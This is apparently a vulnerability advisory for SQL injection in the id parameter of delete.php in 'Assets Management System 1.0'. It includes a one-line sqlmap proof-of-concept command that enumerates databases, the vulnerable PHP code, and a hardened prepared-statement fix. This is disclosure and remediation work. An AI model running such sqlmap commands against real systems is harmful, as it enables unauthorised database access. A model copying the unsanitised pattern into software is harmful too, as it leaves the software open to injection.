Description
Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php.
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
Code review (delete.php)
<?php
include 'core/init.php';      // provides $con (the database connection) used below
$id = $_GET['id'];            // raw query-string value, fully attacker-controlled
delete_data($con, $id);       // $id goes into the SQL query with no validation or escaping
header('location:home.php');
There is no validation or sanitization of the $id variable. This means that any value a user supplies as the id parameter is used directly in the SQL query.
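The usual fix for this pattern is to reject anything that is not a plausible record id before it reaches the database, and then to bind the value as a query parameter instead of interpolating it into the SQL string. The following hardened delete.php is an added example, not code from Assets Management System; it assumes that core/init.php exposes $con as a mysqli connection, and the table name `assets` and column `id` are placeholders for whatever delete_data actually targets.

```php
<?php
// Added example (not the project's own delete.php). Assumptions: core/init.php
// provides $con as a mysqli connection; the table/column names are placeholders.
include 'core/init.php';

// Hardened replacement for delete_data(): accepts only a positive integer id and
// runs the DELETE as a prepared statement with the id bound as a parameter.
// Returns the number of rows deleted, or null when the input was rejected.
function delete_asset_safely(mysqli $con, $rawId): ?int
{
    // 1. Input validation: anything that is not a positive integer is refused
    //    outright, so payloads such as "4 OR 1=1" never get near the query.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterised query: the SQL text is fixed before any user data is
    //    attached, so the bound value can only ever be treated as data.
    $stmt = $con->prepare('DELETE FROM assets WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();

    return $deleted;
}

$result = delete_asset_safely($con, $_GET['id'] ?? '');
if ($result === null) {
    // Rejected input: answer with a client error instead of silently redirecting.
    http_response_code(400);
    exit('invalid id');
}

header('Location: home.php');
exit;
```

Both layers matter on their own: the integer check gives a clear error path and keeps garbage out of the logs, while the prepared statement is what actually removes the injection, so it stays in place even for code paths where the validator is later relaxed (for example, to accept string identifiers).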